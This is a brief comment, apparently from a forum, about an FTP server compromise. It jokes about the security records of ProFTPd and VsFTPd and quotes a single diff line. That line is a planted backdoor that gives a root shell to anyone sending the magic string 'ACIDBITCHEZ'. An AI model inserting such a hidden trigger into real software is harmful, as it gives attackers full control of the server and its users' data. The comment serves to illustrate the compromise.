"
The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server".
...and that makes the score ProFTPd:
35, VsFTPd
8.
Code:
+ if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }